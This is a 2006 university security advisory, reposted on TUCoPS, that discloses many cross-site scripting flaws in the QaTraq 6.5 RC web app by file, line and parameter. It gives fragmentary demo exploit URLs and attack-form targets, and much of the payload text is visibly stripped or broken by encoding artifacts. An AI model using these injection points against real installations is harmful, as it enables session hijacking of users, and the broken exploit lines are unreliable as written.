TUCoPS :: Web :: Apps :: b06-3221.htm

QaTraq 6.5 RC: Multiple XSS Vulnerabilities
QaTraq 6.5 RC: Multiple XSS Vulnerabilities
QaTraq 6.5 RC: Multiple XSS Vulnerabilities


============================================================0D
QaTraq 6.5 RC: Multiple XSS Vulnerabilities=0D
============================================================0D
Technical University of Vienna Security Advisory=0D
TUVSA-0606-001, June 23, 2006=0D
============================================================0D
=0D
=0D
Affected applications=0D
----------------------=0D
=0D
QaTraq (http://sourceforge.net/projects/qatraq/)=0D 
=0D
Versions 6.5 RC and prior.=0D
=0D
=0D
Description=0D
------------=0D
=0D
There are a number of reflected XSS vulnerabilities, some of which are also stored XSS vulnerabilities and perhaps even SQL injection vulnerabilitities. The affected program points as well as demo exploits are given below. The exploits have been tested with the user being logged in as admin, and register_globals being active. It is possible that some vulnerabilities do not require register_globals to be enabled, although we have not tested this. Some of the parameters in the given sample exploits (mainly "id" params) have to be adjusted to the given installation to match existing database entries.=0D
=0D
In addition to program points for which exploits are given, we have listed about 200 places that are very similar in structure. Although we have not explicitly tested them with exploits, we suspect that they are vulnerable as well. =0D
=0D
top.inc=0D
---------=0D
=0D
line 1005=0D
=0D">http://localhost/qatraq65rc/queries_view_search.php?link_print='">=0D 
=0D
line 1007=0D
=0D">http://localhost/qatraq65rc/queries_view_search.php?link_upgrade='">=0D 
=0D
line 1020=0D
=0D">http://localhost/qatraq65rc/queries_view_search.php?link_sql='">=0D 
=0D
line 1041=0D
=0D">http://localhost/qatraq65rc/queries_view_search.php?link_next=">=0D 
=0D
line 1054=0D
=0D">http://localhost/qatraq65rc/queries_view_search.php?link_prev=">=0D 
=0D
line 1067=0D
=0D">http://localhost/qatraq65rc/queries_view_search.php?link_list=">=0D 
=0D
=0D
components_copy_content.php=0D
-----------------------------=0D
=0D
line 233=0D
http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1&msg==0D 
[product_id and id (= component id) must exist in the database]=0D
=0D
line 238=0D
- use the attack page:=0D

=0D">action="http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 260=0D
- analogous to 238:=0D

=0D">action="http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1">=0D 
=0D
=0D
=0D
=0D

=0D
=0D
=0D
components_modify_content.php=0D
-------------------------------=0D
=0D
line 213=0D
http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1&msg==0D 
=0D
line 218=0D

=0D">action="http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 240=0D

=0D">action="http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1">=0D 
=0D
=0D
=0D
=0D

=0D
=0D
=0D
components_new_content.php=0D
-----------------------------=0D
=0D
line 188=0D
http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1&msg==0D 
=0D
line 193=0D

=0D">action="http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 215=0D

=0D">action="http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1">=0D 
=0D
=0D
=0D
=0D

=0D
=0D
=0D
design_copy_content.php=0D
-------------------------=0D
=0D
line 262=0D
- use this page [plan_id must exist in the database]:=0D

=0D">action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 276=0D

=0D">action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 313=0D

=0D">action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
=0D
design_copy_plan_search.php=0D
-----------------------------=0D
=0D
line 106=0D

=0D">action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 107=0D

=0D">action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
design_modify_content.php=0D
---------------------------=0D
=0D
line 282=0D

=0D">action="http://localhost/qatraq65rc/design_modify_content.php?id=1&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 298=0D
- $new_doc_id is constructed from $major_version and $minor_version on line 189; these two are only set if POST['version_increment'] is set; use this page [and watch for suitable id]:=0D

=0D">action="http://localhost/qatraq65rc/design_modify_content.php?id=7">=0D 
=0D
=0D
=0D

=0D
=0D
line 311=0D
- $new_version, analogous to 298=0D
=0D
line 354=0D

=0D">action="http://localhost/qatraq65rc/design_modify_content.php?id=10">=0D 
=0D
=0D
=0D

=0D
=0D
design_new_content.php=0D
------------------------=0D
=0D
line 226=0D

=0D">action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 240=0D

=0D">action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 276=0D

=0D">action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
design_new_search.php=0D
-----------------------=0D
=0D
line 99=0D
=0D">http://localhost/qatraq65rc/design_new_search.php?plan_name=">=0D 
=0D
line 100=0D
=0D">http://localhost/qatraq65rc/design_new_search.php?plan_desc=">=0D 
=0D
download.php=0D
-------------=0D
=0D
line 31=0D
http://localhost/qatraq65rc/download.php?file_name==0D 
=0D
login.php=0D
----------=0D
=0D
line 88=0D
=0D">http://localhost/qatraq65rc/login.php?username=">=0D 
=0D
line 98=0D
=0D">http://localhost/qatraq65rc/login.php?password=">=0D 
=0D
phase_copy_content.php=0D
------------------------=0D
=0D
line 245=0D

=0D">action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 259=0D

=0D">action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 285=0D

=0D">action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
phase_delete_search.php=0D
-------------------------=0D
=0D
line 176=0D

=0D">action="http://localhost/qatraq65rc/phase_delete_search.php">=0D 
=0D
=0D
=0D

=0D
=0D
phase_modify_content.php=0D
--------------------------=0D
=0D
line 273=0D

=0D">action="http://localhost/qatraq65rc/phase_modify_content.php?id=2&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 289=0D

=0D">action="http://localhost/qatraq65rc/phase_modify_content.php?id=2">=0D 
=0D
=0D
=0D

=0D
=0D
line 302=0D
- $new_version, analogous to 289=0D
=0D
line 335=0D

=0D">action="http://localhost/qatraq65rc/phase_modify_content.php?id=2">=0D 
=0D
=0D
=0D

=0D
=0D
phase_modify_search.php=0D
------------------------=0D
=0D
line 177=0D

=0D">action="http://localhost/qatraq65rc/phase_modify_search.php">=0D 
=0D
=0D
=0D

=0D
=0D
phase_new_content.php=0D
----------------------=0D
=0D
line 209=0D

=0D">action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 223=0D

=0D">action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 252=0D

=0D">action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">=0D 
=0D
=0D
=0D

=0D
=0D
phase_view_search.php=0D
----------------------=0D
=0D
line 176=0D

=0D">action="http://localhost/qatraq65rc/phase_view_search.php">=0D 
=0D
=0D
=0D

=0D
=0D
products_copy_content.php=0D
---------------------------=0D
=0D
line 175=0D
http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1&msg==0D 
=0D
line 180=0D

=0D">action="http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1">=0D 
=0D
=0D
=0D

=0D
=0D
line 185=0D

=0D">action="http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1">=0D 
=0D
=0D
=0D
=0D

=0D
=0D
=0D
Other suspicious places (without exploits)=0D
---------------------------------------------=0D
=0D
- products_copy_search.php, line 116, $product_name=0D
- products_copy_search.php, line 117, $product_desc=0D
- products_delete_search.php, line 116, $product_name=0D
- products_delete_search.php, line 117, $product_desc=0D
- products_modify_content.php, line 186, $msg=0D
- products_modify_content.php, line 191, $product_name=0D
- products_modify_content.php, line 196, $product_desc=0D
- products_modify_search.php, line 116, $product_name=0D
- products_modify_search.php, line 117, $product_desc=0D
- products_new_content.php, line 157, $msg=0D
- products_new_content.php, line 162, $product_name=0D
- products_new_content.php, line 167, $product_desc=0D
- products_view_search.php, line 116, $product_name=0D
- products_view_search.php, line 117, $product_desc=0D
- queries_copy_content.php, line 182, $msg=0D
- queries_copy_content.php, line 195, $title=0D
- queries_copy_content.php, line 227, $description=0D
- queries_copy_search.php, line 154, $title=0D
- queries_copy_search.php, line 155, $id=0D
- queries_copy_search.php, line 170, $description=0D
- queries_delete_search.php, line 152, $title=0D
- queries_delete_search.php, line 153, $id=0D
- queries_delete_search.php, line 167, $description=0D
- queries_modify_content.php, line 247, $msg=0D
- queries_modify_content.php, line 260, $title=0D
- queries_modify_content.php, line 292, $description=0D
- queries_modify_content.php, line 308, $query=0D
- queries_modify_search.php, line 152, $title=0D
- queries_modify_search.php, line 153, $id=0D
- queries_modify_search.php, line 167, $description=0D
- queries_new_content.php, line 162, $msg=0D
- queries_new_content.php, line 174, $title=0D
- queries_new_content.php, line 222, $query=0D
- queries_view_search.php, line 156, $title=0D
- queries_view_search.php, line 157, $id=0D
- queries_view_search.php, line 172, $description=0D
- reports_copy_content.php, line 202, $msg=0D
- reports_copy_content.php, line 215, $title=0D
- reports_copy_content.php, line 247, $description=0D
- reports_copy_content.php, line 255, $tmt=0D
- reports_copy_search.php, line 147, $title=0D
- reports_copy_search.php, line 148, $id=0D
- reports_delete_search.php, line 148, $title=0D
- reports_delete_search.php, line 149, $id=0D
- reports_modify_content.php, line 266, $msg=0D
- reports_modify_content.php, line 279, $title=0D
- reports_modify_content.php, line 311, $description=0D
- reports_modify_content.php, line 319, $query  $tmt=0D
- reports_modify_search.php, line 148, $title=0D
- reports_modify_search.php, line 149, $id=0D
- reports_new_content.php, line 162, $msg=0D
- reports_new_content.php, line 174, $title=0D
- reports_new_content.php, line 190, $report_type=0D
- reports_new_content.php, line 206, $description=0D
- reports_new_content.php, line 214, $query  $tmt=0D
- reports_view_content.php, line 187, $tmt =0D
- reports_view_content.php, line 194, $results=0D
- reports_view_search.php, line 147, $title=0D
- reports_view_search.php, line 148, $id=0D
- reports_view_search.php, line 147, $title=0D
- reports_view_search.php, line 148, $id=0D
- requ_copy_content.php, line 217, $title=0D
- requ_copy_content.php, line 252, $url=0D
- requ_copy_content.php, line 274, $content=0D
- requ_modify_content.php, line 209, $title=0D
- requ_modify_content.php, line 244, $url=0D
- requ_modify_content.php, line 266, $content=0D
- requ_new_content.php, line 185, $title=0D
- requ_new_content.php, line 214, $url=0D
- requ_new_content.php, line 237, $content=0D
- requ_new_search.php, line 99, $product_name=0D
- requ_new_search.php, line 100, $product_desc=0D
- results_modify_multiple.php, line 657, -> includes/ui.inc, line 116=0D
- results_modify_multiple.php, line 395, $msg=0D
- results_modify_search.php, line 182, $content=0D
- results_modify_single.php, line 429, $msg=0D
- results_modify_single.php, line 850, $TestDate=0D
- results_view_multiple.php, line 125, $msg=0D
- results_view_search.php, line 182, $content=0D
- results_view_single.php, line 164, $msg=0D
- roles_copy_content.php, line 190, $msg=0D
- roles_copy_content.php, line 195, $role_name=0D
- roles_copy_content.php, line 200, $role_desc=0D
- roles_copy_search.php, line 117, $role_name=0D
- roles_copy_search.php, line 118, $role_desc=0D
- roles_delete_search.php, line 118, $role_name=0D
- roles_delete_search.php, line 119, $role_desc=0D
- roles_modify_content.php, line 203, $msg=0D
- roles_modify_content.php, line 208, $role_name=0D
- roles_modify_content.php, line 213, $role_desc=0D
- roles_modify_search.php, line 118, $role_name=0D
- roles_modify_search.php, line 119, $role_desc=0D
- roles_new_content.php, line 172, $msg=0D
- roles_new_content.php, line 177, $role_name=0D
- roles_new_content.php, line 182, $role_desc=0D
- roles_view_search.php, line 118, $role_name=0D
- roles_view_search.php, line 119, $role_desc=0D
- test_cases_copy_content.php, line 357, -> includes/ui.inc, line 198, $base_url=0D
- test_cases_copy_content.php, line 289, $title=0D
- test_cases_copy_content.php, line 303, $version=0D
- test_cases_copy_content.php, line 382, $content=0D
- test_cases_modify_content.php, line 383, $title=0D
- test_cases_modify_content.php, line 399, $new_doc_id=0D
- test_cases_modify_content.php, line 412, $new_version=0D
- test_cases_modify_content.php, line 486, $content=0D
- test_cases_modify_content.php, line 536, $filter_title=0D
- test_cases_modify_content.php, line 537, $filter_tsc_id=0D
- test_cases_new_content.php, line 341, $title=0D
- test_cases_new_content.php, line 355, $version=0D
- test_cases_new_content.php, line 431, $content=0D
- test_cases_new_content.php, line 481, $filter_title=0D
- test_cases_new_content.php, line 482, $filter_tsc_id=0D
- test_cases_new_search.php, line 99, $product_name=0D
- test_cases_new_search.php, line 100, $product_desc=0D
- test_cases_view_content.php, line 302, $filter_tsc_id=0D
- test_plans_copy_content.php, line 274, $title=0D
- test_plans_copy_content.php, line 292, $version=0D
- test_plans_copy_content.php, line 344, $content=0D
- test_plans_modify_content.php, line 306, $title=0D
- test_plans_modify_content.php, line 322, $new_doc_id=0D
- test_plans_modify_content.php, line 339, $new_version=0D
- test_plans_modify_content.php, line 398, $content=0D
- test_plans_new_content.php, line 240, $title=0D
- test_plans_new_content.php, line 258, $version=0D
- test_plans_new_content.php, line 313, $content=0D
- test_plans_new_search.php, line 96, $project_name=0D
- test_plans_new_search.php, line 97, $project_desc=0D
- test_scripts_copy_content.php, line 354, $title=0D
- test_scripts_copy_content.php, line 368, $version=0D
- test_scripts_copy_content.php, line 500, $content=0D
- test_scripts_copy_design_search.php, line 100, $design_title=0D
- test_scripts_copy_search.php, line 180, $content=0D
- test_scripts_delete_search.php, line 182, $content=0D
- test_scripts_include_cases_search.php, line 417, -> includes/ui.inc, line 34, $table_name=0D
- test_scripts_include_cases_search.php, line 1068, -> includes/ui.inc, line 34, $table_name=0D
- test_scripts_include_cases_search.php, line 875, -> includes/ui.inc, line 198, $base_url=0D
- test_scripts_include_cases_search.php, line 427, $msg=0D
- test_scripts_include_cases_search.php, line 576, $test_script[Title]=0D
- test_scripts_include_cases_search.php, line 798, $tc_msg=0D
- test_scripts_include_cases_search.php, line 809, $tc_title=0D
- test_scripts_include_cases_search.php, line 823, $tc_version=0D
- test_scripts_include_cases_search.php, line 1074, $row[Title]=0D
- test_scripts_include_cases_search.php, line 1084, $row=0D
- test_scripts_include_cases_search.php, line 1087, $row =0D
- test_scripts_include_cases_search.php, line 1096, $row[DocumentID]=0D
- test_scripts_include_cases_search.php, line 1105, $row[ID]=0D
- test_scripts_include_cases_search.php, line 1106, $row[ID]=0D
- test_scripts_include_cases_search.php, line 1108, $row[ID]=0D
- test_scripts_include_cases_search.php, line 1109, $row[ID]=0D
- test_scripts_include_cases_search.php, line 1118, $row =0D
- test_scripts_include_cases_search.php, line 1124, $row  $ordering =0D
- test_scripts_include_search.php, line 163, $content=0D
- test_scripts_modify_content.php, line 404, $title=0D
- test_scripts_modify_content.php, line 420, $new_doc_id=0D
- test_scripts_modify_content.php, line 433, $new_version=0D
- test_scripts_modify_content.php, line 581, $content=0D
- test_scripts_modify_content.php, line 726, $ordering_=0D
- test_scripts_modify_search.php, line 181, $content=0D
- test_scripts_new_content.php, line 293, $title=0D
- test_scripts_new_content.php, line 307, $version=0D
- test_scripts_new_content.php, line 426, $content=0D
- test_scripts_new_search.php, line 93, $design_title=0D
- test_scripts_remove_cases_search.php, line 375, -> includes/ui.inc, line 34, $table_name=0D
- test_scripts_remove_cases_search.php, line 138, -> includes/ui.inc, line 34, $table_name=0D
- test_scripts_remove_cases_search.php, line 148, $msg=0D
- test_scripts_remove_cases_search.php, line 256, $test_script[Title]=0D
- test_scripts_remove_cases_search.php, line 381, $row[Title]=0D
- test_scripts_remove_cases_search.php, line 387, $is_selected  $row=0D
- test_scripts_remove_cases_search.php, line 393, $row[DocumentID]=0D
- test_scripts_remove_cases_search.php, line 405, $row[Ordering]=0D
- test_scripts_remove_cases_search.php, line 423, $row[Title]=0D
- test_scripts_remove_search.php, line 165, $content=0D
- test_scripts_view_search.php, line 182, $content=0D
- upload.php, line 51=0D
- users_copy_content.php, line 249, $msg=0D
- users_copy_content.php, line 254, $login_name=0D
- users_copy_content.php, line 258, $user_name=0D
- users_copy_content.php, line 263, $user_password=0D
- users_copy_search.php, line 129, $login_name=0D
- users_copy_search.php, line 130, $user_name=0D
- users_copy_search.php, line 131, $default_role=0D
- users_delete_content.php, line 146, $msg=0D
- users_delete_search.php, line 129, $login_name=0D
- users_delete_search.php, line 130, $user_name=0D
- users_delete_search.php, line 131, $default_role=0D
- users_modify_content.php, line 463, -> includes/ui.inc, line 116, $arr_table_vals[table_multi_display_line.$i]=0D
- users_modify_content.php, line 385, $msg=0D
- users_modify_content.php, line 394, $user_name=0D
- users_modify_content.php, line 399, $user_password=0D
- users_modify_search.php, line 127, $login_name=0D
- users_modify_search.php, line 128, $user_name=0D
- users_modify_search.php, line 129, $default_role=0D
- users_new_content.php, line 233, $msg=0D
- users_new_content.php, line 238, $login_name=0D
- users_new_content.php, line 242, $user_name=0D
- users_new_content.php, line 247, $user_password=0D
- users_new_content.php, line 251, $user_password2=0D
- users_view_content.php, line 138, $msg=0D
- users_view_search.php, line 129, $login_name=0D
- users_view_search.php, line 130, $user_name=0D
- users_view_search.php, line 131, $default_role=0D
- versions_copy_content.php, line 370, $msg=0D
- versions_copy_content.php, line 375, $version_name=0D
- versions_copy_content.php, line 380, $version_desc=0D
- versions_modify_content.php, line 345, $msg=0D
- versions_modify_content.php, line 350, $version_name=0D
- versions_modify_content.php, line 355, $version_desc=0D
- versions_new_content.php, line 322, $msg=0D
- versions_new_content.php, line 327, $version_name=0D
- versions_new_content.php, line 332, $version_desc=0D
- versions_new_content.php, line 339, $version_date=0D
=0D
=0D
Solution=0D
---------=0D
=0D
The authors did not respond to our notification, so there is no official solution available yet.=0D
=0D
Timeline:=0D
=0D
June 2, 2006: Attempt to contact QaTraq developers via "ashmans at users dot sourceforge dot net" and "traq at users dot sourceforge dot net".=0D
=0D
June 23, 2006: Advisory submission.=0D
=0D
=0D
References=0D
-----------=0D
=0D
http://www.seclab.tuwien.ac.at/advisories/TUVSA-0606-001.txt=0D 
=0D
=0D
Nenad Jovanovic=0D
Secure Systems Lab =0D
Technical University of Vienna =0D
www.seclab.tuwien.ac.at=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH